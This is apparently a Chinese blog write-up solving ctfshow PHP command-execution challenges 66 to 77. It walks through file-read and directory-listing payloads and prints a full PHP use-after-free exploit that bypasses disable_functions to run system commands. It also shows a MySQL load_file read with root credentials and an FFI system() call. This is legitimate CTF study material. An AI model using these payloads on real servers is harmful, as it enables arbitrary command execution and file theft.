ctfshow-web 66-77

于 2024-11-16 17:00:06 发布
阅读量1.2k 收藏 26
点赞数 15
文章标签: web 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_80915592/article/details/143769864
版权

66.

这次show_source被禁用了。用highlight_file()。

这次不在flag.php里了。

那就扫描一下目录,即有c=print_r(scandir('.'))查看当前目录。

啥也没有,就直接看根目录c=print_r(scandir('/'));

应该是在flag.txt里,读取它,c=highlight_file('/flag.txt'); (flag.txt在根目录里,所以要加/)

下文比较详细的介绍了目录扫描的方式,还讲解了无参rce,十分不错。可以简单看看。

常见的绕过姿势(续)_rand()绕过-优快云博客

67.

这此还是不在,直接查看根目录。

print_r被禁用了,但是上题我介绍了3种方法。换个c=var_dump(scandir('/'));

然后读flag.txt就行。

68.

上来就告诉我highlight_file被禁用.直接查看根目录。

这里直接文件包含读取c=include('/flag.txt');

参考了下文,其给出了几种文件包含的函数,附上截图与链接。

ctfshow命令执行 web入门 web64-68_ctfshow web68-优快云博客

69.

highlight_file还是被禁,依照上面的思路

发现var_dump被禁,那就用var_export(scandir('/'));

然后还是文件包含。

70.

先试试原来的payload,c=var_export(scandir('/'));

然后试试文件包含,flag和上面一样,咋方法也一样。

71.

延续上题思路

发现都被过滤了,然后看到题目下有个文件,下载看看。

看到这个。

代码审计一下

ob_get_contents — 返回输出缓冲区的内容,清除的是执行后的结果
ob_end_clean — 清空(擦除)缓冲区并关闭输出缓冲

preg_replace("/[0-9]|[a-z]/i","?",$s)就是将$s中的数字字母全替换成?,这也是为啥刚刚执行后的结果全是?。

所以我们要用exit(0)终止后面的语句(其作用也就是终止脚本运行与die类似)。在这里将exit(0)放到eval里,执行后直接终止,后面的语句就不执行了。

也就是在我们构造的payload后加exi(0);

72.

题目打开依旧是这样,打开代码也是这样。

延续上题思路,发现根目录不能打开,但当前目录可以。

看了下面大佬的wp。

ctfshow-web入门-命令执行(web71-web74)_web72-优快云博客

ctfshow-web入门-命令执行(web71-web74)_web72-优快云博客

所以这里只能用glob伪协议绕过。其实在68题就介绍了这个方法,此题详细解答一下。

c=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString()." ");}exit(0);  #扫描根目录有什么文件
c=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->getFilename()." ");} exit(0);

(注意$f->__toString这双下横线);

解释一下代码。

$a = new DirectoryIterator("glob:///*");
//利用DirectoryIterator($path)可以实现遍历目录下的所有文件
//glob:// — 查找匹配的文件路径模式
//DirectoryIterator("glob:///*")   遍历根目录里所有文件
foreach ($a as $f) { // 遍历每个条目。
    echo($f->__toString() . ' '); // 输出条目的名称,并添加一个空格
}
exit(0); // 终止脚本执行

include失效了,看下面大佬是用个什么绕过安全目录的脚本

<?php
function ctfshow($cmd) {
    global $abc, $helper, $backtrace;

    class Vuln {
        public $a;
        public function __destruct() { 
            global $backtrace; 
            unset($this->a);
            $backtrace = (new Exception)->getTrace();
            if(!isset($backtrace[1]['args'])) {
                $backtrace = debug_backtrace();
            }
        }
    }

    class Helper {
        public $a, $b, $c, $d;
    }

    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= sprintf("%c",($ptr & 0xff));
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = sprintf("%c",($v & 0xff));
            $v >>= 8;
        }
    }

    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) { 

                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { 
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;

            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;

            return $data_addr + $i * 8;
        }
    }

    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) {
                return $addr;
            }
        }
    }

    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);

            if($f_name == 0x6d6574737973) {
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    function trigger_uaf($arg) {

        $arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
        $vuln = new Vuln();
        $vuln->a = $arg;
    }

    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }

    $n_alloc = 10; 
    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

    trigger_uaf('x');
    $abc = $backtrace[1]['args'][0];

    $helper = new Helper;
    $helper->b = function ($x) { };

    if(strlen($abc) == 79 || strlen($abc) == 0) {
        die("UAF failed");
    }

    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;

    write($abc, 0x60, 2);
    write($abc, 0x70, 6);

    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);

    $closure_obj = str2ptr($abc, 0x20);

    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }

    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }

    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }

    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }


    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }

    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); 
    write($abc, 0xd0 + 0x68, $zif_system); 

    ($helper->b)($cmd);
    exit();
}

ctfshow("cat /flag0.txt");ob_end_flush();
?>

详解在下面。它大致讲解了一下代码,十分推荐。
ctfshow学习记录-web入门(命令执行69-77&118)-优快云博客

此代码有点复杂,可以用gpt去啃这代码。这代码不能在win环境上面运行。我们直接在hackbar或者bp上面运行。(这里的运行是让c=脚本,脚本要进行url加密,并且脚本前面的<?和空格要删了);

还有,找到根目录后可以用下面75题的方法,直接从数据库里面找,注意要将等号的url编码换成等号。

c=try {
  $dbh = new PDO('mysql:host=localhost;dbname=information_schema', 'root', 'root');
  foreach($dbh->query('select load_file("/flag0.txt")') as $row) {  
      echo($row[0])."|";
  }
  $dbh = null;
} catch (PDOException $e) {
  echo $e->getMessage();
  die();
};exit();

73.

代码文件就是上题的带代码。直接扫描目录就行。

但是发现这题可以读根目录了。

然后就简单了,比上题还简单。

74.

这里scandir被被禁用了。我们就用golb.或者用glob协议。都行。

接下来就是include读文件。

75.

sacndir依旧被禁用。我们就用glob协议。

本来想用上面的脚本,但是没用,下面的大佬给了解释,说好像啥strlen被过滤了,然后看提示好像是直接查数据库。

c=try {
  $dbh = new PDO('mysql:host=localhost;dbname=information_schema', 'root', 'root');
  foreach($dbh->query('select load_file("/flag36.txt")') as $row) {  
      echo($row[0])."|";
  }
  $dbh = null;
} catch (PDOException $e) {
  echo $e->getMessage();
  die();
};exit();
try {
    // 使用PDO(PHP Data Objects)创建一个新的数据库连接对象,指定DSN、用户名(root)和密码(root)
    $dbh = new PDO('mysql:host=localhost;dbname=information_schema', 'root', 'root');
    
    // 执行一个SQL查询,从指定的文件(/flag36.txt)中读取内容
    foreach($dbh->query('select load_file("/flag36.txt")') as $row) {  
        // 输出读取到的内容,并追加一个竖线(|)
        echo($row[0])."|";
    }
    
    // 将数据库连接对象设置为null,关闭连接
    $dbh = null;
} catch (PDOException $e) {
    // 如果发生PDO异常,输出错误信息
    echo $e->getMessage();
    // 终止脚本执行
    die();
}
 
// 终止脚本执行
exit();

这大佬还使用了sql语句从数据库查询一步一步查flag,但是结果好像不行。详解可以看下文。

ctfshow-web入门-命令执行(web75-web77)_ctfshow web75-优快云博客

记得url编码,看大佬wp不用编码就行,我这不编码会有语法错误。

76.

glob协议查找。然后还是用上面的代码,哦,记得将文件名改成flag36d.txt,还有等号的url编码改成=。

77.

依旧glob协议查到目录。

 

然后本来想在用上面从数据库找的方法,出现could not find driver。看下面大佬的方法,直接读readflag,至于为什么不读flag36.txt,下面文章有详解。

c=$ffi = FFI::cdef("int system(const char *command);");$a='/readflag > 1.txt';$ffi->system($a);

ctfshow-web入门-命令执行(web75-web77)_ctfshow web75-优快云博客

命令执行差不多了。之后会写一篇博客将这些题的知识点总结一下。

[ctfshow]web入门——命令执行(web72-web77
ShenZ的博客
12-02 2737
ctfshow的命令执行(web72-77)
CTFshow 命令执行 web66
Kradress的博客
12-03 436
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_POST
ctfshow web-77
weixin_74336671的博客
02-03 581
发现 flag36x.txt 文件。同时根目录下还有 readflag,估计需要调用 readflag 获取 flag。访问 1.txt 即可获取 flag。先直接用伪协议获取 flag 位置。
ctfshow web66
m0_69289738的博客
09-20 164
var_dump(scandir('.'))查看当前的目录。发现代码是可以执行的,但是flag文件不在这。先尝试一下highlight_file()发现目标文件,直接访问得flag。
CTFshow 命令执行 web77
Kradress的博客
12-06 781
目录源码思路题解总结 源码 Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14 Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15 Warning: highlight_file() has been dis
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFShow-WEB入门--信息搜集详细Wp_ctfshow web
2401_84297944的博客
04-28 1121
F12。
网络安全最全ctfshow-web-命令执行
2401_84301922的博客
05-04 370
localeconv():返回包含本地化数字和货币格式信息的联数组,这里主要是返回数组第一个"."next():将数组指针指向下一个,这里可以省略倒置和改变数组指针,直接利用[2]取出数组也可以。的url编码,适用php7。②通过嵌套eval函数来获取另一个参数的的方法来绕过,不会判断其他参数的传入。scandir():遍历目录,这里因为参数为"."所以遍历当前目录。④利用参数输入+include+伪协议(不用括号、分号)pos():输出数组第一个元素,不改变指针。其他的过滤了无所谓,但过滤了.和空格。
CTFShow-WEB入门--信息搜集详细Wp_ctfshow web(1)
2401_87205009的博客
09-18 439
【代码】CTFShow-WEB入门--信息搜集详细Wp_ctfshow web(1)
ctfshow-Web入门-58~74wp
yutianovo的博客
09-24 1220
Web58-65 POST c=include($_GET['url']); GET /?url=php://filter/read=convert.base64-encode/resource=flag.php Web66-70 flag 换位置了 /flag.txt Payload还可以用 Web71 import requests url = "http://c5e8824e-b5b4-4842-8d39-bbcb78eb7976.chall.ctf.show/" d = {'c': 'i
ctfshow-web入门-命令执行(web75-web77
Welcome To Myon'Blog !
07-01 2003
利用 mysql load_file 读文件,提示中是从数据库 ctftraining 中查询的,就算我们不知道这个数据库名,也可以直接从默认的 information_schema 中查,该数据库包含了所有的数据库的内容。(readflag 这个东西在前面的题里面遇到过,它是一个可执行的二进制文件,执行它即可获取 flag,这里为什么要用这个 readflag 而不是直接读取 flag36x.txt 我们后面再说)接下来的三个字符 r-- 表示文件所有者(root)具有读取权限,但没有写入或执行权限。
ctfshow web入门 命令执行web75-77
weixin_44700621的博客
06-20 1950
ctfshow web入门 命令执行 web75和web77题简单分析
ctfshow web入门58-77(命令执行 bypass禁用函数和访问目录)
Firebasky的博客
09-18 1947
1. web58-65 payload:c=show_source('flag.php'); 2. web66 1.查看flag文件 c=print_r(scandir("/")); c=highlight_file('/flag.txt'); 3. web67 盲猜 c=highlight_file('/flag.txt'); 4. web68-70 尝试include('index.php'); 发现字节太大了 直接盲猜c=include('/flag.txt'); 5. web71 <?php
ctfshow-web入门-命令执行(web66-web70)
Welcome To Myon'Blog !
06-30 871
先使用scandir() 进行目录扫描,对于 txt 文件,我们使用 include 进行包含就可以直接看到文件内容,ini_set用来设置php.ini的值,在函数执行的时候生效,脚本结束后,设置失效。
CTFshow web入门之命令执行(web29-web77
小白的博客
05-10 3231
2、然后上传一个new2.php文件并抓包,多试几次,因为不一定生成的临时文件的最后一个字母是大写,文件内容如下。1、先构造一个文件上传的html页面,代码如下(test-fileupdown.html)3、在上传文件的过程中,抓包,之后添加参数c=.%20/?4、所以传入这个参数的意思就是匹配上传command.php所生成的临时文件,并执行。接着直接用cat flag.php查看一下flag.php文件就好了。略(与web41相同)
CTFshow刷题日记-WEB-命令执行下55-77
Love&Share
09-04 3524
web55 if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } 不能出现英文字符 方法1 ?c=/???/????64 ???????? 但是这个不是通用的,base64不是每个机器都用 方法2 bzip2的使用 bzip2是linux下面的压缩文件的命令 我们可以通过该命令压缩fla
CTFshow web入门 web71~web77 web118~web122 web124 命令执行
qq_56815564的博客
04-21 1101
在RANDOM中产生的随机数可以是1、2、3、4、5这个5个数,但1,2,3这三个出现的概率很低,所以基本上是4或5,因此如果要使用RANDOM的话其实也有碰运气的成分在里面,没准就撞到了正确的数。回到构造 4 这个字符上,再Linux中,${#xxx}显示的是这个数值的位数,而如果不加 # 的话就是显示这个数原本的值,比如12345再加上#后就是5。像 /bin/cat flag.php 之类的也是可以的,这个只需要构造一个 t 和 / 就行了,构造出来的长度也短一些。
ctfshow终极考核 web66-web669
羽的博客
01-03 1445
配合脚本学习效果更好 web666 可以先看下668 先通过js rce ,然后又拿的flag,flag在数据库中 web667 扫描端口可以找到 3000端口 flag_667=ctfshow{503a075560764e3d116436ab73d7a560} web668 通过jade原型链污染写入一个nodejs,并且运行 jade原型链污染可以看下这篇文章 https://blog.youkuaiyun.com/miuzzx/article/details/111780832 写入的nodejs内容如下 var
CTFshow_web入门_命令执行(web29-web77web118-web122、web124)
monster663的博客
02-02 1282
CTFshow web入门系列持续更新 web入门_命令执行 web29 上源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:26:48 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ er
CTFSHOW-web-web4
最新发布
12-27
### CTF SHOW Web 类别挑战资源与解决方案 对于参与CTF SHOW平台上Web类别的挑战,特别是针对`web4`这一具体题目,可以借鉴一些通用的Web安全漏洞利用技巧以及特定于该平台的经验分享。通常情况下,这类挑战会涉及到常见的Web应用程序漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞(LFI/RFI)等。 为了更好地理解和解决这些挑战,可以从以下几个方面入手: #### 学习基础理论和技术 深入理解HTTP协议的工作原理及其请求响应机制是非常重要的。掌握如何通过浏览器开发者工具分析网络流量可以帮助识别潜在的安全问题[^1]。 #### 利用在线学习资源 有许多优质的网站提供了Web渗透测试的学习材料和实践环境,例如OWASP Top Ten项目文档,它列举并解释了当前最严重的Web应用风险;还有像PortSwigger Academy这样的平台提供了一系列课程来教授各种类型的Web漏洞挖掘方法。 #### 参考社区讨论和Writeup 加入相的技术论坛或社交媒体群组,在那里可以看到其他参赛者发布的writeups(解题报告),这对于获取灵感非常有帮助。GitHub上也有很多开源仓库专门收集整理了不同赛事下的高质量writeup链接集合。 ```python import requests def check_sql_injection(url, param): test_payload = "' OR '1'='1" data = {param: test_payload} response = requests.post(url, data=data) if "Welcome" in response.text: print(f"[+] SQL Injection vulnerability detected on parameter '{param}'!") else: print("[-] No SQL Injection found.") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值